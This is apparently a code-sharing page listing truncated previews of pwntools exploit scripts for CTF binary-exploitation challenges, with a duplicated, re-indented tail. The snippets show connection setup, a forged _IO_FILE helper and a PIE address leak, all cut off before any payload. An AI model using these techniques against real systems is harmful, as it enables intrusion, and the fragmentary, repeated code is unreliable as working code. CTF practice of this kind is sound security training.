Mech0n

## FakeFile_x64.py
def pack_file_64(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,

## geekpwn2020-babypwn.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

p = process('./pwn')

libc = 0

## sctf2020_coolcode.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(os = 'linux', log_level='debug')

p = process('./pwn')

shellcode1 = '''

## echo_from_your_heart.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./echo_from_your_heart')
p = remote('192.168.0.102', 1000)
libc = ELF('libc.so')

## CISCN-Final-2.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

p = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

## ciscn_final_5.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./pwn')
p = remote('node3.buuoj.cn', 25264)
elf = ELF('./pwn')

## ciscn_2019_s_6.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./pwn')
p = remote('node3.buuoj.cn', 25688)

## ciscn_s_1.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./pwn')
p = remote('node3.buuoj.cn', 26285)
elf = ELF('./pwn')

## sstf_t_express.py
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

p = process('./t_express')
libc = ELF('libc.so.6')

def debug(p, cmd):
    gdb.attach(p, cmd)

## sstf-eat_the_pie.py
from pwn import *

s = process("./eat_the_pie")


s.sendafter('Select > ','1'*0x10)
s.recvuntil("1234567890123456")
pie = u32(s.recv(4))-0x74d
success(hex(pie))
sh = 0x31A+pie
	def pack_file_64(_flags = 0,
	_IO_read_ptr = 0,
	_IO_read_end = 0,
	_IO_read_base = 0,
	_IO_write_base = 0,
	_IO_write_ptr = 0,
	_IO_write_end = 0,
	_IO_buf_base = 0,
	_IO_buf_end = 0,
	_IO_save_base = 0,
	#! /usr/bin/python
	#-- coding: utf-8 --
	from pwn import *

	context.terminal = ['tmux', 'splitw', '-h']
	context(arch = 'amd64' , os = 'linux', log_level='debug')

	p = process('./pwn')

	libc = 0
	from pwn import *

	s = process("./eat_the_pie")


	s.sendafter('Select > ','1'*0x10)
	s.recvuntil("1234567890123456")
	pie = u32(s.recv(4))-0x74d
	success(hex(pie))
	sh = 0x31A+pie